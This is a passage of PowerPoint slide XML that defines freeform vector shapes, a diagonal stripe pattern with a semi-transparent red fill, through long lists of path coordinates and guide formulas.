                  <a:pt x="23952868" y="13693044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="13813075"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9892756" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10012795" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="13940076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="14060112"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9645743" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9765783" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="14187086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="14307125"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9518742" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952868" y="14434132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="14554143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9398728" y="4"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9151713" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9271725" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="14681144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="14801155"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9024712" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="14928159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="15048200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8904671" y="4"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8657655" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8777672" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="15175197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="15295213"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8410643" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8530654" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="15422215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="15542226"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8163602" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8283639" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="15669232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="15789269"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7916590" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8036596" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="15916273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16036275"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7422526" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7542554" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16410317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16530345"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7175508" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7295525" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="16657344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16777363"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7789583" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16163288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16283322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7669550" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7048513" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="16904359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="17024381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6928490" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6801500" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="17151371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="17271410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6681461" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6554460" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952868" y="17398408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="17518428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6434443" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6307442" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="17645423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="17765460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6187408" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6060407" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="17892464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="18012480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5940390" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5813384" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952870" y="18139487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="18259515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5693356" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5566366" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952868" y="18386502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="18506524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5446343" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5319353" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952868" y="18633514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="18753542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5199326" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5072318" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23952868" y="18880549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="19000577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4952290" y="2"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4705278" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4825312" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="19127556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="19247592"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4458249" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4578277" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="19374591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="19494618"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4211226" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4331248" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="19621620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="19741645"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3964196" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4084225" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="19868646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="19988671"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3717195" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3837201" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="20115667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="20235673"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3470149" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3590189" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="20362682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="20482718"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3223131" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3343160" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="20609708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="20729736"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2976102" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3096141" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="20856726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="20976765"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2729079" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2849118" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="21103749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952867" y="21223789"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2482066" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2602083" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="21350784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="21470802"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2235048" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2355065" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="21597805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="21717820"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1988014" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2108052" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="21844818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952871" y="21964858"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1740996" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1861012" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="22091855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952871" y="22211876"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1493972" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1613989" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="22338878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="22458896"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1246949" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1366982" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="22585888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="22705920"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="999919" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1119947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="22832918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="22952949"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="752907" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="872924" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952869" y="23079945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="23199961"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="505878" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="625905" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952871" y="23326960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="23446990"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="258854" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="378882" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952868" y="23573987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952871" y="23694011"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11831" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="131864" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952871" y="23821007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23952870" y="23941035"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="DA291C">
              <a:alpha val="7490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400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Freihandform: Form 302">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62BD2102-9925-4775-B197-9B09FC7B3457}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635300" y="550975"/>
            <a:ext cx="5221288" cy="5508625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY0" fmla="*/ 26793701 h 26946982"/>
              <a:gd name="connsiteX1" fmla="*/ 153283 w 23952872"/>
              <a:gd name="connsiteY1" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX2" fmla="*/ 33255 w 23952872"/>
              <a:gd name="connsiteY2" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX3" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY3" fmla="*/ 26913728 h 26946982"/>
              <a:gd name="connsiteX4" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY4" fmla="*/ 26546677 h 26946982"/>
              <a:gd name="connsiteX5" fmla="*/ 400306 w 23952872"/>
              <a:gd name="connsiteY5" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX6" fmla="*/ 280280 w 23952872"/>
              <a:gd name="connsiteY6" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX7" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY7" fmla="*/ 26666704 h 26946982"/>
              <a:gd name="connsiteX8" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY8" fmla="*/ 26299654 h 26946982"/>
              <a:gd name="connsiteX9" fmla="*/ 647330 w 23952872"/>
              <a:gd name="connsiteY9" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX10" fmla="*/ 527302 w 23952872"/>
              <a:gd name="connsiteY10" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX11" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY11" fmla="*/ 26419681 h 26946982"/>
              <a:gd name="connsiteX12" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY12" fmla="*/ 26052627 h 26946982"/>
              <a:gd name="connsiteX13" fmla="*/ 894353 w 23952872"/>
              <a:gd name="connsiteY13" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX14" fmla="*/ 774326 w 23952872"/>
              <a:gd name="connsiteY14" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX15" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY15" fmla="*/ 26172654 h 26946982"/>
              <a:gd name="connsiteX16" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY16" fmla="*/ 25805604 h 26946982"/>
              <a:gd name="connsiteX17" fmla="*/ 1141377 w 23952872"/>
              <a:gd name="connsiteY17" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX18" fmla="*/ 1021350 w 23952872"/>
              <a:gd name="connsiteY18" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX19" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY19" fmla="*/ 25925631 h 26946982"/>
              <a:gd name="connsiteX20" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY20" fmla="*/ 25558583 h 26946982"/>
              <a:gd name="connsiteX21" fmla="*/ 1388400 w 23952872"/>
              <a:gd name="connsiteY21" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX22" fmla="*/ 1268373 w 23952872"/>
              <a:gd name="connsiteY22" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX23" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY23" fmla="*/ 25678610 h 26946982"/>
              <a:gd name="connsiteX24" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY24" fmla="*/ 25311557 h 26946982"/>
              <a:gd name="connsiteX25" fmla="*/ 1635424 w 23952872"/>
              <a:gd name="connsiteY25" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX26" fmla="*/ 1515397 w 23952872"/>
              <a:gd name="connsiteY26" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX27" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY27" fmla="*/ 25431587 h 26946982"/>
              <a:gd name="connsiteX28" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY28" fmla="*/ 25064536 h 26946982"/>
              <a:gd name="connsiteX29" fmla="*/ 1882447 w 23952872"/>
              <a:gd name="connsiteY29" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX30" fmla="*/ 1762420 w 23952872"/>
              <a:gd name="connsiteY30" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX31" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY31" fmla="*/ 25184563 h 26946982"/>
              <a:gd name="connsiteX32" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY32" fmla="*/ 24817512 h 26946982"/>
              <a:gd name="connsiteX33" fmla="*/ 2129470 w 23952872"/>
              <a:gd name="connsiteY33" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX34" fmla="*/ 2009444 w 23952872"/>
              <a:gd name="connsiteY34" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX35" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY35" fmla="*/ 24937540 h 26946982"/>
              <a:gd name="connsiteX36" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY36" fmla="*/ 24570489 h 26946982"/>
              <a:gd name="connsiteX37" fmla="*/ 2376494 w 23952872"/>
              <a:gd name="connsiteY37" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX38" fmla="*/ 2256467 w 23952872"/>
              <a:gd name="connsiteY38" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX39" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY39" fmla="*/ 24690516 h 26946982"/>
              <a:gd name="connsiteX40" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY40" fmla="*/ 24323464 h 26946982"/>
              <a:gd name="connsiteX41" fmla="*/ 2623518 w 23952872"/>
              <a:gd name="connsiteY41" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX42" fmla="*/ 2503491 w 23952872"/>
              <a:gd name="connsiteY42" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX43" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY43" fmla="*/ 24443493 h 26946982"/>
              <a:gd name="connsiteX44" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY44" fmla="*/ 24076441 h 26946982"/>
              <a:gd name="connsiteX45" fmla="*/ 2870541 w 23952872"/>
              <a:gd name="connsiteY45" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX46" fmla="*/ 2750514 w 23952872"/>
              <a:gd name="connsiteY46" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX47" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY47" fmla="*/ 24196469 h 26946982"/>
              <a:gd name="connsiteX48" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY48" fmla="*/ 23829417 h 26946982"/>
              <a:gd name="connsiteX49" fmla="*/ 3117565 w 23952872"/>
              <a:gd name="connsiteY49" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX50" fmla="*/ 2997537 w 23952872"/>
              <a:gd name="connsiteY50" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX51" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY51" fmla="*/ 23949446 h 26946982"/>
              <a:gd name="connsiteX52" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY52" fmla="*/ 23582391 h 26946982"/>
              <a:gd name="connsiteX53" fmla="*/ 3364588 w 23952872"/>
              <a:gd name="connsiteY53" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX54" fmla="*/ 3244561 w 23952872"/>
              <a:gd name="connsiteY54" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX55" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY55" fmla="*/ 23702419 h 26946982"/>
              <a:gd name="connsiteX56" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY56" fmla="*/ 23335371 h 26946982"/>
              <a:gd name="connsiteX57" fmla="*/ 3611612 w 23952872"/>
              <a:gd name="connsiteY57" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX58" fmla="*/ 3491585 w 23952872"/>
              <a:gd name="connsiteY58" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX59" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY59" fmla="*/ 23455398 h 26946982"/>
              <a:gd name="connsiteX60" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY60" fmla="*/ 23088347 h 26946982"/>
              <a:gd name="connsiteX61" fmla="*/ 3858635 w 23952872"/>
              <a:gd name="connsiteY61" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX62" fmla="*/ 3738608 w 23952872"/>
              <a:gd name="connsiteY62" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX63" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY63" fmla="*/ 23208372 h 26946982"/>
              <a:gd name="connsiteX64" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY64" fmla="*/ 22841321 h 26946982"/>
              <a:gd name="connsiteX65" fmla="*/ 4105659 w 23952872"/>
              <a:gd name="connsiteY65" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX66" fmla="*/ 3985632 w 23952872"/>
              <a:gd name="connsiteY66" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX67" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY67" fmla="*/ 22961351 h 26946982"/>
              <a:gd name="connsiteX68" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY68" fmla="*/ 22594297 h 26946982"/>
              <a:gd name="connsiteX69" fmla="*/ 4352682 w 23952872"/>
              <a:gd name="connsiteY69" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX70" fmla="*/ 4232655 w 23952872"/>
              <a:gd name="connsiteY70" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX71" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY71" fmla="*/ 22714327 h 26946982"/>
              <a:gd name="connsiteX72" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY72" fmla="*/ 22347277 h 26946982"/>
              <a:gd name="connsiteX73" fmla="*/ 4599706 w 23952872"/>
              <a:gd name="connsiteY73" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX74" fmla="*/ 4479679 w 23952872"/>
              <a:gd name="connsiteY74" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX75" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY75" fmla="*/ 22467304 h 26946982"/>
              <a:gd name="connsiteX76" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY76" fmla="*/ 22100253 h 26946982"/>
              <a:gd name="connsiteX77" fmla="*/ 4846730 w 23952872"/>
              <a:gd name="connsiteY77" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX78" fmla="*/ 4726702 w 23952872"/>
              <a:gd name="connsiteY78" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX79" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY79" fmla="*/ 22220280 h 26946982"/>
              <a:gd name="connsiteX80" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY80" fmla="*/ 21853230 h 26946982"/>
              <a:gd name="connsiteX81" fmla="*/ 5093753 w 23952872"/>
              <a:gd name="connsiteY81" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX82" fmla="*/ 4973726 w 23952872"/>
              <a:gd name="connsiteY82" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX83" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY83" fmla="*/ 21973257 h 26946982"/>
              <a:gd name="connsiteX84" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY84" fmla="*/ 21606206 h 26946982"/>
              <a:gd name="connsiteX85" fmla="*/ 5340776 w 23952872"/>
              <a:gd name="connsiteY85" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX86" fmla="*/ 5220749 w 23952872"/>
              <a:gd name="connsiteY86" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX87" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY87" fmla="*/ 21726233 h 26946982"/>
              <a:gd name="connsiteX88" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY88" fmla="*/ 21359182 h 26946982"/>
              <a:gd name="connsiteX89" fmla="*/ 5587800 w 23952872"/>
              <a:gd name="connsiteY89" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX90" fmla="*/ 5467773 w 23952872"/>
              <a:gd name="connsiteY90" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX91" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY91" fmla="*/ 21479210 h 26946982"/>
              <a:gd name="connsiteX92" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY92" fmla="*/ 21112156 h 26946982"/>
              <a:gd name="connsiteX93" fmla="*/ 5834823 w 23952872"/>
              <a:gd name="connsiteY93" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX94" fmla="*/ 5714796 w 23952872"/>
              <a:gd name="connsiteY94" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX95" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY95" fmla="*/ 21232186 h 26946982"/>
              <a:gd name="connsiteX96" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY96" fmla="*/ 20865132 h 26946982"/>
              <a:gd name="connsiteX97" fmla="*/ 6081847 w 23952872"/>
              <a:gd name="connsiteY97" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX98" fmla="*/ 5961820 w 23952872"/>
              <a:gd name="connsiteY98" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX99" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY99" fmla="*/ 20985163 h 26946982"/>
              <a:gd name="connsiteX100" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY100" fmla="*/ 20618111 h 26946982"/>
              <a:gd name="connsiteX101" fmla="*/ 6328871 w 23952872"/>
              <a:gd name="connsiteY101" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX102" fmla="*/ 6208843 w 23952872"/>
              <a:gd name="connsiteY102" fmla="*/ 26946978 h 26946982"/>
